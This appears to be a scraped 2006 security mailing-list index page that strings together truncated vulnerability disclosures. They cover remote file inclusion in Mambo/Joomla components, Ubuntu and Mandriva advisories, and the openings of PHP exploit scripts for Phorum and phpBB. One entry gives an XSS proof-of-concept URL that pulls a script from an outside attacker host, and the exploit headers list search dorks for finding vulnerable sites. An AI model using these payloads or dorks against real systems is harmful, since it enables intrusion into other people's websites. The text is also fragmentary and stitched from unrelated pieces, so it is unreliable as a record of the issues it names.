ECHO_ADV_38$2006
---
[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include
Vulnerabilities
Photocycle v1.0
Homepage
http://adambrown.info/p/tools/photocycle
XSS vuln on phpage var:
PoC
http://www.example.com/photocyclephpage=script%20src=http://www.youfucktard.com/xss.js/script
ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability
--
Discoverd By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
script site: www.scoznet.com
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below
which is displayed on screen:
Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability
--
Discoverd By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
Exploit:
===
Ubuntu Security Notice USN-317-1 July 13, 2006
zope2.8 vulnerability
CVE-2006-3458
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
This
===
Ubuntu Security Notice USN-318-1 July 13, 2006
libtunepimp vulnerability
http://bugs.musicbrainz.org/ticket/1764
===
A security issue affects the following Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:122
http://www.mandriva.com/security/
12/07/200619.11.54
- Flatnuke 2.5.7 arbitrary file upload / remote code execution -
software:
site: http://www.flatnuke.org/
if user Gallery uploads are enabled (not the default) you can go to:
#!/usr/bin/php -q -d short_open_tag=on
?
echo PHORUM 5 arbitrary local inclusion exploit\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\n;;
echo dork: \This forum powered by Phorum.\\n\n;
/*
works with:
register_globals=On
magic_quotes_gpc=Off
*/
if
#!/usr/bin/php -q -d short_open_tag=on
?
echo PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials
disclosure\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\n;;
echo dork, version specific: \Powered by phpBB * 2002, 2006 phpBB
Group\\n\n;
/*
Hello,
El jue, 13-07-2006 a las 01:35 +, [EMAIL PROTECTED] escribió:
require_once( $mosConfig_absolute_path .
'/includes/domit/xml_domit_lite_include.php' );
Variables $mosConfig_absolute_path are not properly sanitized.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:123
http://www.mandriva.com/security/
---
perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---
Remote : Yes
Critical Level : High
Vuln founded in a log file: lazy
rPath Security Advisory: 2006-0122-2
Published: 2006-07-07
Updated:
2006-07-13 Upgraded to Critical status with additional information
Products: rPath Linux 1
Rating: Critical
Exposure Level Classification:
Local Root Deterministic Privilege Escalation
Updated Versions:
kernel=/[EMAIL
15 matches
Mail list logo